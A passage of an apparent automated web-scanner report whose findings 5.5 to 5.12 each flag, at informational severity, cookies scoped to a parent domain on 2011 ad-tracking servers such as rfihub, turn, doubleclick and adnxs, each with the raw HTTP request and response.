Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: g="aABsHUtkw==A-ac0ldxTL_CNwb|9530|84152|361230|12352|824|99188|445|38387|6613AAABLzpChvw="; f="aABnVdpdA==AK1302352529AB1AAABLzpChvo="; s="aAC7sFUPw==AE9479AN1294103956000AAABLzpChvo=AE8438AN1275963655000AAABLzpChvo="; a=c369576644441445519; j=c369576644441445519; o=1-DIhc6MPrMFqM; p=1-DIhc6MPrMFqM; r=1302352529146; u="aABnAskUA==AI89bBrQ==AAABLzpCpLs="; e=cd

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: a2=8663496762294337265;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:37 GMT
Set-Cookie: j2=8663496762294337265;Path=/;Domain=.rfihub.com
Set-Cookie: t1=1302352537225;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:37 GMT
Set-Cookie: u="aABnAunNw==AI89bBrQ==AAABLzpCpoo=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:37 GMT
Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:37 GMT
Set-Cookie: a=c369576644441445519;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:37 GMT
Set-Cookie: j=c369576644441445519;Path=/;Domain=.rfihub.com
Content-Type: image/gif
Set-Cookie: o=1-DIhc6MPrMFqM;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:37 GMT
Set-Cookie: p=1-DIhc6MPrMFqM;Path=/;Domain=.rfihub.com
Set-Cookie: r=1302352529146;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:37 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
5.5. http://a.rfihub.com/sed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /sed

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf= HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370522&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&dt=1302352522769&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352522793&frm=0&adk=2815960337&ga_vid=983270927.1302352523&ga_sid=1302352523&ga_hid=1867116075&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18963&fu=0&ifi=1&dtd=103&xpc=mxzeQN3016&p=http%3A//www.wcax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: g="aABMFwoTA==A-aAcXzUJ2ZpCiN|9530|84152|361230|12352|824|99188|445|38387|6613AAABLzpCh6o=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Set-Cookie: u="aABnActyg==AI89bBrQ==AAABLzpCh6k=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Set-Cookie: f="aABnVZ4PA==AK1302352529AB1AAABLzpCh6g=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Set-Cookie: s="aACqCxNPw==AE9479AN1294103956000AAABLzpCh6g=AE8438AN1275963655000AAABLzpCh6g=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Cache-Control: no-cache
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Set-Cookie: a=c369576644441445542;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:29 GMT
Set-Cookie: j=c369576644441445542;Path=/;Domain=.rfihub.com
Set-Cookie: o=1-qI823taMvmm8;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:29 GMT
Set-Cookie: p=1-qI823taMvmm8;Path=/;Domain=.rfihub.com
Set-Cookie: r=1302352529321;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:29 GMT
Content-Length: 2760

<html><body><span id="__rfi" style="height:0px; width:0px"><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2;sz=300x250;ord=1302352529320;click=h
...[SNIP]...
5.6. http://a.rfihub.com/tk.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /tk.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tk.gif?rb=445&re=12387&aa=9530,84152,12352,361230,824,10261,c0ldxTL_CNwb,http%3A%2F%2Frocketfuelinc.com,492,1249,38387,1279,6613&pa=ppre352525508247&id=&ra=3525276570.8074509229045361&ct=1302352527657 HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: g="aABsHUtkw==A-ac0ldxTL_CNwb|9530|84152|361230|12352|824|99188|445|38387|6613AAABLzpChvw="; u="aABnAgfAg==AI89bBrQ==AAABLzpChvs="; f="aABnVdpdA==AK1302352529AB1AAABLzpChvo="; s="aAC7sFUPw==AE9479AN1294103956000AAABLzpChvo=AE8438AN1275963655000AAABLzpChvo="; e=cd; a=c369576644441445519; j=c369576644441445519; o=1-DIhc6MPrMFqM; p=1-DIhc6MPrMFqM; r=1302352529146

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: u="aABnAm_Fg==AI89bBrQ==AAABLzpCn-0=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:35 GMT
Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:35 GMT
Content-Type: image/gif
Content-Length: 42
Cache-Control: no-cache

GIF89a.............!.......,........@..D.;
5.7. http://a1.interclick.com/ColDta.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /ColDta.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ColDta.aspx HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://cdn.interclick.com/DtCol.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=a53875b5-a877-4a03-ad1a-e28c70299475; ucap=sl=1; FC_51=113861=17621725:1; IFC=n=1&w13741=1&a113861=1&e=634382119927363227; Aqprep_Banner300X250=113861=634381255927393227:13741; Li=1=734237&30=734237; tpd=i20=&e20=1305135081313&i90=&e90=1303147881323&i50=&e50=1305135081318&i100=&e100=1303147881396

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: tpd=e20=1305135081313&e90=1303147881323&e50=1305135081318&e100=1303147881396; domain=.interclick.com; expires=Wed, 11-May-2011 17:33:17 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 11 Apr 2011 17:33:16 GMT

GIF89a.............!.......,...........D..;
5.8. http://ad.afy11.net/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?mode=7&publisher_dsp_id=2&external_user_id=4608069584519221037 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=&mpid=&fpid=-1&rnd=7441790688687410964&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=rQ1Ia8xMj0KaI6M6V7+M3Q; s=1,2*4d9a32eb*X4TKR-a8TD*MbX-VAoK_2NCLHMLyLVahutgcQ==*

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: image/gif
Content-Length: 45
Set-Cookie: s=1,2*4d9a32eb*gNkbP117fj*Xk4nbYfLb776H4OdvScWOgThiQ==*; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

GIF89a.............!.......,...........D..;if
5.9. http://ad.doubleclick.net/adj/wn.loc.wcax/political  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.wcax/political

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adj/wn.loc.wcax/political;sz=850x30;wnsz=85;tile=1;wncc=Political;wnpt=S;wnpc=story;wncp=WCAX;wncid=503137;wnad85=wcax;apptype=platform;env=production;ord=81143749? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 09 Apr 2011 12:53:17 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sat, 09 Apr 2011 12:38:17 GMT
Expires: Sat, 09 Apr 2011 12:38:17 GMT
Cache-Control: private
Content-Length: 1434

document.write('<!-- Template ID = 8688 Template Name = +WorldNow Pencil Pushdown: Images -->\n\n<!-- Template Id = 8688 Template Name = WorldNow Pencil Pushdown: Images -->\n<DIV align=center><A href
...[SNIP]...
5.10. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /server/ads.js?pub=6552261&cch=6553220&code=6554741&l=468x60&aid=25429411&ahcid=595414&bimpd=bvq28451foJSYWMGSWpGLm57PuP1ep3e8pYSpjMgXYBgzZsm_MD3Ph0_AT4tfqL1DmeJqXqoXz4419yIOhU5gOeJMESGQq7G9iOXNAB4-MSg_E-gdQPFfwGO456s277eQI6aJFALXQQZneqbwRBx74CSLEVQbXs-IEXofIReOpq_XD26qi_jA_AuAQLWcK-tlTKPEPwzWzLjcG0petCQ0kOZWgcTS_a_4u4oxn8pOmWjHRY6EBGuSwXwHGMEC0xL3dnura1cEVep9swAHPGcQgMIlGKLUwZcdE7RzNOB1XKprf8mRndDhhFf8Sdys88gdgxCVuolRLb7Z-3WuXH2eelAZ6GtOP-ASuDVvjj6Alva3C8QNQcmEuoh5hLm8UhVLPCQNQ1NJ6FtytBorXofoFtBivKRqgKwft45cpCMCxp949Lefsp8QsMgMdbB8_G407eUqjR_zXj68onFm3lvdZYjcV-mkQxfnW3r5gh2ZcKhGAdZc50HfofVzLGPk2rHHwOWv-gGYK-_EdRAynUJQc9OQ0JCH3IRRC2v9iFYyIGsJ_FzMFXQEDgUfSCtUSLiNCZslCDsmK2JC-xdJmz2cjfYrblFN1Vrq7tHBSJG_h8MbnZNh9bOlTF5VJxTMpf6PQwEcwTA1AnGV4Q2SYTL57oEC7wd4-ropmSQNL3Tn8jt_T370WDWWY1SqEwEJwbhIPZgphozREaBUNGGZK6KHTQH4WG9KeAs_FmnJA3_tygz_AroS6eWPLNVODVq-iRPeSnzq5ViiHXxn7qhO2_sdw&acp=0.027583195495811192 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15069%7C15069%7C15069%7C15069%7Cundefined%7C15069%7C15069%7Cundefined%7C15069%7C15069%7C15069%7C15069%7C15069%7C15069%7Cundefined%7C15069; rv=1; uid=4608069584519221037; pf=cu1FbtXKKpFof-hWjfkQRcVIkA_tbns9D4-b88MB0l6CH-nC-kQ69MLaDP7avFRDzd5xTtrRgn51HC41qoSB9_pqNLucEh96CCAoHJ73Ep-dCbxIubA9vJ0TJiztXY_3cxb2oDS_ZBeMeceweOTTRM5O3f8IMqs1jnadlyIx8Ew

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Mon, 11 Apr 2011 12:35:43 GMT
Set-Cookie: uid=4608069584519221037; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:43 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=tmY-x8L_yowSJFqM0vF4Y8CuY9t_hBSzjQil7z33OlYpagDPKKctVczI9DEFcEkPcxpGHxRlubu1xR21Mxu4g-sHDXOosP1lwOMr_-ta2t973bvsD6p3TnXOe8vTPY4VFaT6eTBuV55JRFz8lx3PqdqozOSXNU0m0cAav4sZMCcTY1vGdjvt8S43nB6dS9OmxjcTGL1eKfAUVOMXIUnylA; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:43 GMT; Path=/
Set-Cookie: fc=eFAOz3ilQ4gYIBtFIJGWAE5_UN3y883I71mcX_0aEuuubHizRKm2LPdnMwd17GsW3WQO872ou4xvEVRnVXW81PsHnm-jU8W9DeXq1d2r1JKkV1vPzSwkQiZJzLr4lAFo; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:43 GMT; Path=/
Set-Cookie: pf=snK9kHUjEl1FaWKxPCEh1sJ8lErb_iSlHvQid9sfqYGDVsdGVkOFL386xes7a4VRH-w_0yHZxr5U-a1ULJAMKQRyElVn9VAUzXky4Bxf5K8hlcBpkm8Sg5-23YdyuJpz9_hZk2y4Lc1tg0PRNwxT__KovNH6HfPSeeybFLsgN_DN9JRYGQVWUbjEaPiKqkBr8AkkycJ0w6q2tbQDIXhSrAgkLZbHfwITF7RboAby-GXjYWEb1kaerphA9cWJarOLh_BwiBS09OfPB0I41L7nq5FuSGZvCDWT_YGlhDw-_9zGhvu2FiJEpdM7zDK0xqeWNUj9wzAaHETIIAZhDZgOW6C-zFUZM9OcnDkQKyl2S7I; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:43 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:35:43 GMT
Content-Length: 10051


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
5.11. http://admeld.adnxs.com/usersync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usersync?calltype=admeld&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros?t=1302538875852&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid2=8663496762294337265; anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTk^i4(0yHan$WRZ?dsg4U!.GQv!b=rS4vsHr#5hLUHfpwcPki/)#5j#QOVB/1X?`d/Lh<E'Cm2t/WTA]'`kG3]ocdCcrW'<%^Ue4vP!!5ch.vajEL)BV[>#vXU'Dqt8H!mBfnMp/NHg8A3Ndz!g8cZwEc(wVe4[.3A2tr=lb)p#*Xc02Og?@'f9fL9.O3]'UWJ-No-vqc^97BbwdN:A>`PTQ'knJh9yhU$

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 16:21:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:19 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 11 Apr 2011 16:21:19 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=8663496762294337265&expiration=0" width="0" height="0"/>');
5.12. http://admeld.lucidmedia.com/clicksense/admeld/match  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/admeld/match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain
Date: Mon, 11 Apr 2011 16:31:19 GMT
Expires: Mon, 11 Apr 2011 16:31:19 GMT
P3P: CP=NOI ADM DEV CUR
Server: Apache-Coyote/1.1
